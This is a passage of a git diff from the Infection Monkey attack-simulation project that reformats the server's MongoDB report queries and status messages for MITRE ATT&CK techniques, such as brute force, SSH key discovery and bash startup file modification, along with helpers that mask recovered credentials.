"$project": { + "_id": 0, + "machine": "$data.machine", + "info": "$data.info", + "attempt_cnt": {"$size": "$data.attempts"}, + "attempts": { + "$filter": { + "input": "$data.attempts", + "as": "attempt", + "cond": {"$eq": ["$$attempt.result", True]}, + } + }, + } + }, + ] @staticmethod def get_report_data(): @@ -31,10 +40,10 @@ class T1110(AttackTechnique): succeeded = False for result in attempts: - result['successful_creds'] = [] - for attempt in result['attempts']: + result["successful_creds"] = [] + for attempt in result["attempts"]: succeeded = True - result['successful_creds'].append(parse_creds(attempt)) + result["successful_creds"].append(parse_creds(attempt)) if succeeded: status = ScanStatus.USED.value @@ -48,7 +57,7 @@ class T1110(AttackTechnique): data = T1110.get_base_data_by_status(status) # Remove data with no successful brute force attempts - attempts = [attempt for attempt in attempts if attempt['attempts']] + attempts = [attempt for attempt in attempts if attempt["attempts"]] - data.update({'services': attempts}) + data.update({"services": attempts}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py index 3a13c5101..e0d079d7e 100644 --- 
a/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py @@ -5,12 +5,14 @@ __author__ = "VakarisZ" class T1129(UsageTechnique): tech_id = "T1129" - unscanned_msg = "Monkey didn't try to load any DLLs since it didn't run on any Windows machines." + unscanned_msg = ( + "Monkey didn't try to load any DLLs since it didn't run on any Windows machines." + ) scanned_msg = "Monkey tried to load DLLs, but failed." used_msg = "Monkey successfully loaded DLLs using Windows module loader." @staticmethod def get_report_data(): data = T1129.get_tech_base_data() - data.update({'dlls': T1129.get_usage_data()}) + data.update({"dlls": T1129.get_usage_data()}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1136.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1136.py index d9d86e08e..dfc5945a3 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1136.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1136.py @@ -1,4 +1,7 @@ -from common.common_consts.post_breach_consts import POST_BREACH_BACKDOOR_USER, POST_BREACH_COMMUNICATE_AS_NEW_USER +from common.common_consts.post_breach_consts import ( + POST_BREACH_BACKDOOR_USER, + POST_BREACH_COMMUNICATE_AS_NEW_USER, +) from monkey_island.cc.services.attack.technique_reports.pba_technique import PostBreachTechnique __author__ = "shreyamalviya" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py index 5d96d863e..82dccf639 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py @@ -12,11 +12,21 @@ class T1145(AttackTechnique): used_msg = "Monkey found ssh keys on machines in the network." # Gets data about ssh keys found - query = [{'$match': {'telem_category': 'system_info', - 'data.ssh_info': {'$elemMatch': {'private_key': {'$exists': True}}}}}, - {'$project': {'_id': 0, - 'machine': {'hostname': '$data.hostname', 'ips': '$data.network_info.networks'}, - 'ssh_info': '$data.ssh_info'}}] + query = [ + { + "$match": { + "telem_category": "system_info", + "data.ssh_info": {"$elemMatch": {"private_key": {"$exists": True}}}, + } + }, + { + "$project": { + "_id": 0, + "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"}, + "ssh_info": "$data.ssh_info", + } + }, + ] @staticmethod def get_report_data(): @@ -32,5 +42,5 @@ class T1145(AttackTechnique): status, ssh_info = get_technique_status_and_data() data = T1145.get_base_data_by_status(status) - data.update({'ssh_info': ssh_info}) + data.update({"ssh_info": ssh_info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py index e1ca3423f..9391e52e9 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py @@ -6,16 +6,30 @@ __author__ = "shreyamalviya" class T1146(PostBreachTechnique): tech_id = "T1146" - unscanned_msg = "Monkey didn't try clearing the command history since it didn't run on any Linux machines." + unscanned_msg = ( + "Monkey didn't try clearing the command history since it didn't run on any Linux machines." + ) scanned_msg = "Monkey tried clearing the command history but failed." 
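Several hunks in this area (T1129 and T1146 above, and T1156, T1168, T1053, T1075 and T1197 elsewhere) apply the same black transformation: a message that used to overflow the line limit is wrapped in parentheses, and multi-part messages rely on implicit string literal concatenation rather than trailing backslashes or "+" chains (the T1216 hunk further down keeps explicit "+" between its literals). Both spellings build the identical string; a quick check with a shortened message:

# Single long literal, as on the pre-black lines.
old = "Monkey didn't try to load any DLLs since it didn't run on any Windows machines."

# Black-style: the same text wrapped in parentheses and split into adjacent string
# literals, which Python concatenates at compile time.
new = (
    "Monkey didn't try to load any DLLs "
    "since it didn't run on any Windows machines."
)

assert old == new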
used_msg = "Monkey successfully cleared the command history (and then restored it back)." pba_names = [POST_BREACH_CLEAR_CMD_HISTORY] @staticmethod def get_pba_query(*args): - return [{'$match': {'telem_category': 'post_breach', - 'data.name': POST_BREACH_CLEAR_CMD_HISTORY}}, - {'$project': {'_id': 0, - 'machine': {'hostname': {'$arrayElemAt': ['$data.hostname', 0]}, - 'ips': [{'$arrayElemAt': ['$data.ip', 0]}]}, - 'result': '$data.result'}}] + return [ + { + "$match": { + "telem_category": "post_breach", + "data.name": POST_BREACH_CLEAR_CMD_HISTORY, + } + }, + { + "$project": { + "_id": 0, + "machine": { + "hostname": {"$arrayElemAt": ["$data.hostname", 0]}, + "ips": [{"$arrayElemAt": ["$data.ip", 0]}], + }, + "result": "$data.result", + } + }, + ] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py index 0b2fdf41e..abd32f78f 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py @@ -6,19 +6,36 @@ __author__ = "shreyamalviya" class T1156(PostBreachTechnique): tech_id = "T1156" - unscanned_msg = "Monkey didn't try modifying bash startup files since it didn't run on any Linux machines." + unscanned_msg = ( + "Monkey didn't try modifying bash startup files since it didn't run on any Linux machines." + ) scanned_msg = "Monkey tried modifying bash startup files but failed." used_msg = "Monkey successfully modified bash startup files." pba_names = [POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION] @staticmethod def get_pba_query(*args): - return [{'$match': {'telem_category': 'post_breach', - 'data.name': POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION}}, - {'$project': {'_id': 0, - 'machine': {'hostname': {'$arrayElemAt': ['$data.hostname', 0]}, - 'ips': [{'$arrayElemAt': ['$data.ip', 0]}]}, - 'result': '$data.result'}}, - {'$unwind': '$result'}, - {'$match': {'$or': [{'result': {'$regex': r'\.bash'}}, - {'result': {'$regex': r'\.profile'}}]}}] + return [ + { + "$match": { + "telem_category": "post_breach", + "data.name": POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION, + } + }, + { + "$project": { + "_id": 0, + "machine": { + "hostname": {"$arrayElemAt": ["$data.hostname", 0]}, + "ips": [{"$arrayElemAt": ["$data.ip", 0]}], + }, + "result": "$data.result", + } + }, + {"$unwind": "$result"}, + { + "$match": { + "$or": [{"result": {"$regex": r"\.bash"}}, {"result": {"$regex": r"\.profile"}}] + } + }, + ] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1168.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1168.py index a690086dc..5e387a6ba 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1168.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1168.py @@ -6,7 +6,9 @@ __author__ = "shreyamalviya" class T1168(PostBreachTechnique): tech_id = "T1168" - unscanned_msg = "Monkey didn't try scheduling a job on Linux since it didn't run on any Linux machines." + unscanned_msg = ( + "Monkey didn't try scheduling a job on Linux since it didn't run on any Linux machines." + ) scanned_msg = "Monkey tried scheduling a job on the Linux system but failed." used_msg = "Monkey scheduled a job on the Linux system." 
pba_names = [POST_BREACH_JOB_SCHEDULING] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py index 2dbf87638..473e2b9df 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py @@ -24,14 +24,18 @@ class T1188(AttackTechnique): proxy_count += 1 proxy = proxy.tunnel if proxy_count > 1: - hops.append({'from': initial.get_network_info(), - 'to': proxy.get_network_info(), - 'count': proxy_count}) + hops.append( + { + "from": initial.get_network_info(), + "to": proxy.get_network_info(), + "count": proxy_count, + } + ) status = ScanStatus.USED.value if hops else ScanStatus.UNSCANNED.value return (status, hops) status, hops = get_technique_status_and_data() data = T1188.get_base_data_by_status(status) - data.update({'hops': hops}) + data.update({"hops": hops}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py index b87aeb275..be1b669f6 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py @@ -6,22 +6,29 @@ __author__ = "VakarisZ" class T1197(AttackTechnique): tech_id = "T1197" - unscanned_msg = "Monkey didn't try to use any bits jobs since it didn't run on any Windows machines." + unscanned_msg = ( + "Monkey didn't try to use any bits jobs since it didn't run on any Windows machines." + ) scanned_msg = "Monkey tried to use bits jobs but failed." used_msg = "Monkey successfully used bits jobs at least once in the network." @staticmethod def get_report_data(): data = T1197.get_tech_base_data() - bits_results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'attack', - 'data.technique': T1197.tech_id}}, - {'$group': {'_id': {'ip_addr': '$data.machine.ip_addr', - 'usage': '$data.usage'}, - 'ip_addr': {'$first': '$data.machine.ip_addr'}, - 'domain_name': {'$first': '$data.machine.domain_name'}, - 'usage': {'$first': '$data.usage'}, - 'time': {'$first': '$timestamp'}} - }]) + bits_results = mongo.db.telemetry.aggregate( + [ + {"$match": {"telem_category": "attack", "data.technique": T1197.tech_id}}, + { + "$group": { + "_id": {"ip_addr": "$data.machine.ip_addr", "usage": "$data.usage"}, + "ip_addr": {"$first": "$data.machine.ip_addr"}, + "domain_name": {"$first": "$data.machine.domain_name"}, + "usage": {"$first": "$data.usage"}, + "time": {"$first": "$timestamp"}, + } + }, + ] + ) bits_results = list(bits_results) - data.update({'bits_jobs': bits_results}) + data.update({"bits_jobs": bits_results}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py index baefcba8e..9d4a17bf5 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py @@ -7,8 +7,12 @@ __author__ = "VakarisZ" class T1210(AttackTechnique): tech_id = "T1210" - unscanned_msg = "Monkey didn't scan any remote services. Maybe it didn't find any machines on the network?" - scanned_msg = "Monkey scanned for remote services on the network, but couldn't exploit any of them." + unscanned_msg = ( + "Monkey didn't scan any remote services. Maybe it didn't find any machines on the network?" 
+    )
+    scanned_msg = (
+        "Monkey scanned for remote services on the network, but couldn't exploit any of them."
+    )
     used_msg = "Monkey scanned for remote services and exploited some on the network."
 
     @staticmethod
@@ -31,29 +35,45 @@ class T1210(AttackTechnique):
             scanned_services, exploited_services = [], []
         else:
             scanned_services, exploited_services = status_and_data[1], status_and_data[2]
-        data = {'title': T1210.technique_title()}
+        data = {"title": T1210.technique_title()}
         data.update(T1210.get_message_and_status(status))
         data.update(T1210.get_mitigation_by_status(status))
-        data.update({'scanned_services': scanned_services, 'exploited_services': exploited_services})
+        data.update(
+            {"scanned_services": scanned_services, "exploited_services": exploited_services}
+        )
         return data
 
     @staticmethod
     def get_scanned_services():
-        results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'scan'}},
-                                                {'$sort': {'data.service_count': -1}},
-                                                {'$group': {
-                                                    '_id': {'ip_addr': '$data.machine.ip_addr'},
-                                                    'machine': {'$first': '$data.machine'},
-                                                    'time': {'$first': '$timestamp'}}}])
+        results = mongo.db.telemetry.aggregate(
+            [
+                {"$match": {"telem_category": "scan"}},
+                {"$sort": {"data.service_count": -1}},
+                {
+                    "$group": {
+                        "_id": {"ip_addr": "$data.machine.ip_addr"},
+                        "machine": {"$first": "$data.machine"},
+                        "time": {"$first": "$timestamp"},
+                    }
+                },
+            ]
+        )
         return list(results)
 
     @staticmethod
     def get_exploited_services():
-        results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'exploit', 'data.result': True}},
-                                                {'$group': {
-                                                    '_id': {'ip_addr': '$data.machine.ip_addr'},
-                                                    'service': {'$first': '$data.info'},
-                                                    'machine': {'$first': '$data.machine'},
-                                                    'time': {'$first': '$timestamp'}}}])
+        results = mongo.db.telemetry.aggregate(
+            [
+                {"$match": {"telem_category": "exploit", "data.result": True}},
+                {
+                    "$group": {
+                        "_id": {"ip_addr": "$data.machine.ip_addr"},
+                        "service": {"$first": "$data.info"},
+                        "machine": {"$first": "$data.machine"},
+                        "time": {"$first": "$timestamp"},
+                    }
+                },
+            ]
+        )
         return list(results)
 
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py
index 796c1a043..6ed73765a 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py
@@ -6,15 +6,21 @@ __author__ = "shreyamalviya"
 
 class T1216(PostBreachTechnique):
     tech_id = "T1216"
-    unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
-                    "pre-existing signed script since it didn't run on any Windows machines. " +\
-                    "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
-                    "bypass application control and signature validation on systems."
-    scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
-                  "pre-existing signed script on Windows but failed. " +\
-                  "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
-                  "bypass application control and signature validation on systems."
-    used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\
-               "This behavior could be abused by adversaries to execute malicious files that could " +\
-               "bypass application control and signature validation on systems."
+    unscanned_msg = (
+        "Monkey didn't attempt to execute an arbitrary program with the help of a "
+        + "pre-existing signed script since it didn't run on any Windows machines. "
+        + "If successful, this behavior could be abused by adversaries to execute malicious files that could "
+        + "bypass application control and signature validation on systems."
+    )
+    scanned_msg = (
+        "Monkey attempted to execute an arbitrary program with the help of a "
+        + "pre-existing signed script on Windows but failed. "
+        + "If successful, this behavior could be abused by adversaries to execute malicious files that could "
+        + "bypass application control and signature validation on systems."
+    )
+    used_msg = (
+        "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. "
+        + "This behavior could be abused by adversaries to execute malicious files that could "
+        + "bypass application control and signature validation on systems."
+    )
     pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py
index 940c9e8ea..3a6ba6f97 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py
@@ -11,14 +11,28 @@ class T1222(AttackTechnique):
     scanned_msg = "Monkey tried to change file permissions, but failed."
     used_msg = "Monkey successfully changed file permissions in network systems."
 
-    query = [{'$match': {'telem_category': 'attack',
-                         'data.technique': 'T1222',
-                         'data.status': ScanStatus.USED.value}},
-             {'$group': {'_id': {'machine': '$data.machine', 'status': '$data.status', 'command': '$data.command'}}},
-             {"$replaceRoot": {"newRoot": "$_id"}}]
+    query = [
+        {
+            "$match": {
+                "telem_category": "attack",
+                "data.technique": "T1222",
+                "data.status": ScanStatus.USED.value,
+            }
+        },
+        {
+            "$group": {
+                "_id": {
+                    "machine": "$data.machine",
+                    "status": "$data.status",
+                    "command": "$data.command",
+                }
+            }
+        },
+        {"$replaceRoot": {"newRoot": "$_id"}},
+    ]
 
     @staticmethod
     def get_report_data():
         data = T1222.get_tech_base_data()
-        data.update({'commands': list(mongo.db.telemetry.aggregate(T1222.query))})
+        data.update({"commands": list(mongo.db.telemetry.aggregate(T1222.query))})
         return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py
index c2ed8d3f8..d348c921b 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py
@@ -13,11 +13,23 @@ class T1504(PostBreachTechnique):
 
     @staticmethod
     def get_pba_query(*args):
-        return [{'$match': {'telem_category': 'post_breach',
-                            'data.name': POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION}},
-                {'$project': {'_id': 0,
-                              'machine': {'hostname': {'$arrayElemAt': ['$data.hostname', 0]},
-                                          'ips': [{'$arrayElemAt': ['$data.ip', 0]}]},
-                              'result': '$data.result'}},
-                {'$unwind': '$result'},
-                {'$match': {'result': {'$regex': r'profile\.ps1'}}}]
+        return [
+            {
+                "$match": {
+                    "telem_category": "post_breach",
+                    "data.name": POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION,
+                }
+            },
+            {
+                "$project": {
+                    "_id": 0,
+                    "machine": {
+                        "hostname": {"$arrayElemAt": ["$data.hostname", 0]},
+                        "ips": [{"$arrayElemAt": ["$data.ip", 0]}],
+                    },
+                    "result": "$data.result",
+                }
+            },
+            {"$unwind": "$result"},
+            {"$match": {"result": {"$regex": r"profile\.ps1"}}},
+ ] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py index 61c1f89bd..7cdf9010c 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py @@ -10,8 +10,10 @@ from monkey_island.cc.services.attack.attack_config import AttackConfig logger = logging.getLogger(__name__) -disabled_msg = "This technique has been disabled. " +\ - "You can enable it from the [configuration page](../../configure)." +disabled_msg = ( + "This technique has been disabled. " + + "You can enable it from the [configuration page](../../configure)." +) class AttackTechnique(object, metaclass=abc.ABCMeta): @@ -65,13 +67,21 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): """ if not cls._is_enabled_in_config(): return ScanStatus.DISABLED.value - elif mongo.db.telemetry.find_one({'telem_category': 'attack', - 'data.status': ScanStatus.USED.value, - 'data.technique': cls.tech_id}): + elif mongo.db.telemetry.find_one( + { + "telem_category": "attack", + "data.status": ScanStatus.USED.value, + "data.technique": cls.tech_id, + } + ): return ScanStatus.USED.value - elif mongo.db.telemetry.find_one({'telem_category': 'attack', - 'data.status': ScanStatus.SCANNED.value, - 'data.technique': cls.tech_id}): + elif mongo.db.telemetry.find_one( + { + "telem_category": "attack", + "data.status": ScanStatus.SCANNED.value, + "data.technique": cls.tech_id, + } + ): return ScanStatus.SCANNED.value else: return ScanStatus.UNSCANNED.value @@ -83,7 +93,7 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): :param status: Enum from common/attack_utils.py integer value :return: Dict with message and status """ - return {'message': cls.get_message_by_status(status), 'status': status} + return {"message": cls.get_message_by_status(status), "status": status} @classmethod def get_message_by_status(cls, status): @@ -106,7 +116,7 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): """ :return: techniques title. E.g. 
"T1110 Brute force" """ - return AttackConfig.get_technique(cls.tech_id)['title'] + return AttackConfig.get_technique(cls.tech_id)["title"] @classmethod def get_tech_base_data(cls): @@ -117,16 +127,16 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): data = {} status = cls.technique_status() title = cls.technique_title() - data.update({'status': status, - 'title': title, - 'message': cls.get_message_by_status(status)}) + data.update( + {"status": status, "title": title, "message": cls.get_message_by_status(status)} + ) data.update(cls.get_mitigation_by_status(status)) return data @classmethod def get_base_data_by_status(cls, status): data = cls.get_message_and_status(status) - data.update({'title': cls.technique_title()}) + data.update({"title": cls.technique_title()}) data.update(cls.get_mitigation_by_status(status)) return data @@ -134,14 +144,19 @@ class AttackTechnique(object, metaclass=abc.ABCMeta): def get_mitigation_by_status(cls, status: ScanStatus) -> dict: if status == ScanStatus.USED.value: mitigation_document = AttackMitigations.get_mitigation_by_technique_id(str(cls.tech_id)) - return {'mitigations': mitigation_document.to_mongo().to_dict()['mitigations']} + return {"mitigations": mitigation_document.to_mongo().to_dict()["mitigations"]} else: return {} @classmethod def is_status_disabled(cls, get_technique_status_and_data) -> bool: def check_if_disabled_in_config(): - return (ScanStatus.DISABLED.value, []) if not cls._is_enabled_in_config() else get_technique_status_and_data() + return ( + (ScanStatus.DISABLED.value, []) + if not cls._is_enabled_in_config() + else get_technique_status_and_data() + ) + return check_if_disabled_in_config @classmethod diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py b/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py index da475c697..1366f0d3a 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py @@ -25,33 +25,45 @@ class PostBreachTechnique(AttackTechnique, metaclass=abc.ABCMeta): :return: Mongo query that parses attack telemetries for a simple report component (gets machines and post-breach action usage). 
""" - return [{'$match': {'telem_category': 'post_breach', - '$or': [{'data.name': pba_name} for pba_name in post_breach_action_names]}}, - {'$project': {'_id': 0, - 'machine': {'hostname': '$data.hostname', - 'ips': ['$data.ip']}, - 'result': '$data.result'}}] + return [ + { + "$match": { + "telem_category": "post_breach", + "$or": [{"data.name": pba_name} for pba_name in post_breach_action_names], + } + }, + { + "$project": { + "_id": 0, + "machine": {"hostname": "$data.hostname", "ips": ["$data.ip"]}, + "result": "$data.result", + } + }, + ] @classmethod def get_report_data(cls): """ :return: Technique's report data aggregated from the database """ + @cls.is_status_disabled def get_technique_status_and_data(): info = list(mongo.db.telemetry.aggregate(cls.get_pba_query(cls.pba_names))) status = ScanStatus.UNSCANNED.value if info: - successful_PBAs = mongo.db.telemetry.count({ - '$or': [{'data.name': pba_name} for pba_name in cls.pba_names], - 'data.result.1': True - }) + successful_PBAs = mongo.db.telemetry.count( + { + "$or": [{"data.name": pba_name} for pba_name in cls.pba_names], + "data.result.1": True, + } + ) status = ScanStatus.USED.value if successful_PBAs else ScanStatus.SCANNED.value return (status, info) - data = {'title': cls.technique_title()} + data = {"title": cls.technique_title()} status, info = get_technique_status_and_data() data.update(cls.get_base_data_by_status(status)) - data.update({'info': info}) + data.update({"info": info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py b/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py index 6921b0129..0a9a1045b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py @@ -7,16 +7,16 @@ def parse_creds(attempt): :param attempt: login attempt from database :return: string with username and used password/hash """ - username = attempt['user'] - creds = {'lm_hash': {'type': 'LM hash', 'output': censor_hash(attempt['lm_hash'])}, - 'ntlm_hash': {'type': 'NTLM hash', 'output': censor_hash(attempt['ntlm_hash'], 20)}, - 'ssh_key': {'type': 'SSH key', 'output': attempt['ssh_key']}, - 'password': {'type': 'Plaintext password', 'output': censor_password(attempt['password'])}} + username = attempt["user"] + creds = { + "lm_hash": {"type": "LM hash", "output": censor_hash(attempt["lm_hash"])}, + "ntlm_hash": {"type": "NTLM hash", "output": censor_hash(attempt["ntlm_hash"], 20)}, + "ssh_key": {"type": "SSH key", "output": attempt["ssh_key"]}, + "password": {"type": "Plaintext password", "output": censor_password(attempt["password"])}, + } for key, cred in list(creds.items()): if attempt[key]: - return '%s ; %s : %s' % (username, - cred['type'], - cred['output']) + return "%s ; %s : %s" % (username, cred["type"], cred["output"]) def censor_password(password, plain_chars=3, secret_chars=5): @@ -30,7 +30,7 @@ def censor_password(password, plain_chars=3, secret_chars=5): if not password: return "" password = get_encryptor().dec(password) - return password[0:plain_chars] + '*' * secret_chars + return password[0:plain_chars] + "*" * secret_chars def censor_hash(hash_, plain_chars=5): @@ -43,4 +43,4 @@ def censor_hash(hash_, plain_chars=5): if not hash_: return "" hash_ = get_encryptor().dec(hash_) - return hash_[0: plain_chars] + ' ...' + return hash_[0:plain_chars] + " ..." 
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py b/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py
index 862207505..bfa406b96 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py
@@ -14,10 +14,12 @@ class UsageTechnique(AttackTechnique, metaclass=abc.ABCMeta):
         :return: usage string
         """
         try:
-            usage['usage'] = UsageEnum[usage['usage']].value[usage['status']]
+            usage["usage"] = UsageEnum[usage["usage"]].value[usage["status"]]
         except KeyError:
-            logger.error("Error translating usage enum. into string. "
-                         "Check if usage enum field exists and covers all telem. statuses.")
+            logger.error(
+                "Error translating usage enum. into string. "
+                "Check if usage enum field exists and covers all telem. statuses."
+            )
         return usage
 
     @classmethod
@@ -35,17 +37,30 @@ class UsageTechnique(AttackTechnique, metaclass=abc.ABCMeta):
         :return: Query that parses attack telemetries for a simple report component
         (gets machines and attack technique usage).
         """
-        return [{'$match': {'telem_category': 'attack',
-                            'data.technique': cls.tech_id}},
-                {'$lookup': {'from': 'monkey',
-                             'localField': 'monkey_guid',
-                             'foreignField': 'guid',
-                             'as': 'monkey'}},
-                {'$project': {'monkey': {'$arrayElemAt': ['$monkey', 0]},
-                              'status': '$data.status',
-                              'usage': '$data.usage'}},
-                {'$addFields': {'_id': 0,
-                                'machine': {'hostname': '$monkey.hostname', 'ips': '$monkey.ip_addresses'},
-                                'monkey': 0}},
-                {'$group': {'_id': {'machine': '$machine', 'status': '$status', 'usage': '$usage'}}},
-                {"$replaceRoot": {"newRoot": "$_id"}}]
+        return [
+            {"$match": {"telem_category": "attack", "data.technique": cls.tech_id}},
+            {
+                "$lookup": {
+                    "from": "monkey",
+                    "localField": "monkey_guid",
+                    "foreignField": "guid",
+                    "as": "monkey",
+                }
+            },
+            {
+                "$project": {
+                    "monkey": {"$arrayElemAt": ["$monkey", 0]},
+                    "status": "$data.status",
+                    "usage": "$data.usage",
+                }
+            },
+            {
+                "$addFields": {
+                    "_id": 0,
+                    "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"},
+                    "monkey": 0,
+                }
+            },
+            {"$group": {"_id": {"machine": "$machine", "status": "$status", "usage": "$usage"}}},
+            {"$replaceRoot": {"newRoot": "$_id"}},
+        ]
diff --git a/monkey/monkey_island/cc/services/attack/test_mitre_api_interface.py b/monkey/monkey_island/cc/services/attack/test_mitre_api_interface.py
index 4866a6729..44297795c 100644
--- a/monkey/monkey_island/cc/services/attack/test_mitre_api_interface.py
+++ b/monkey/monkey_island/cc/services/attack/test_mitre_api_interface.py
@@ -4,12 +4,11 @@ from monkey_island.cc.services.attack.mitre_api_interface import MitreApiInterfa
 
 
 class TestMitreApiInterface(TestCase):
-
     def test_get_all_mitigations(self):
         mitigations = MitreApiInterface.get_all_mitigations()
         self.assertIsNotNone((len(mitigations.items()) >= 282))
         mitigation = next(iter(mitigations.values()))
-        self.assertEqual(mitigation['type'], "course-of-action")
-        self.assertIsNotNone(mitigation['name'])
-        self.assertIsNotNone(mitigation['description'])
-        self.assertIsNotNone(mitigation['external_references'])
+        self.assertEqual(mitigation["type"], "course-of-action")
+        self.assertIsNotNone(mitigation["name"])
+        self.assertIsNotNone(mitigation["description"])
+        self.assertIsNotNone(mitigation["external_references"])
diff --git a/monkey/monkey_island/cc/services/bootloader.py b/monkey/monkey_island/cc/services/bootloader.py
index 2d8a14055..05bdac8f1 100644
---
a/monkey/monkey_island/cc/services/bootloader.py +++ b/monkey/monkey_island/cc/services/bootloader.py @@ -4,20 +4,22 @@ from bson import ObjectId from monkey_island.cc.database import mongo from monkey_island.cc.services.node import NodeCreationException, NodeService -from monkey_island.cc.services.utils.bootloader_config import MIN_GLIBC_VERSION, SUPPORTED_WINDOWS_VERSIONS +from monkey_island.cc.services.utils.bootloader_config import ( + MIN_GLIBC_VERSION, + SUPPORTED_WINDOWS_VERSIONS, +) from monkey_island.cc.services.utils.node_states import NodeStates class BootloaderService: - @staticmethod def parse_bootloader_telem(telem: Dict) -> bool: - telem['ips'] = BootloaderService.remove_local_ips(telem['ips']) - if telem['os_version'] == "": - telem['os_version'] = "Unknown OS" + telem["ips"] = BootloaderService.remove_local_ips(telem["ips"]) + if telem["os_version"] == "": + telem["os_version"] = "Unknown OS" telem_id = BootloaderService.get_mongo_id_for_bootloader_telem(telem) - mongo.db.bootloader_telems.update({'_id': telem_id}, {'$setOnInsert': telem}, upsert=True) + mongo.db.bootloader_telems.update({"_id": telem_id}, {"$setOnInsert": telem}, upsert=True) will_monkey_run = BootloaderService.is_os_compatible(telem) try: @@ -26,33 +28,33 @@ class BootloaderService: # Didn't find the node, but allow monkey to run anyways return True - node_group = BootloaderService.get_next_node_state(node, telem['system'], will_monkey_run) - if 'group' not in node or node['group'] != node_group.value: - NodeService.set_node_group(node['_id'], node_group) + node_group = BootloaderService.get_next_node_state(node, telem["system"], will_monkey_run) + if "group" not in node or node["group"] != node_group.value: + NodeService.set_node_group(node["_id"], node_group) return will_monkey_run @staticmethod def get_next_node_state(node: Dict, system: 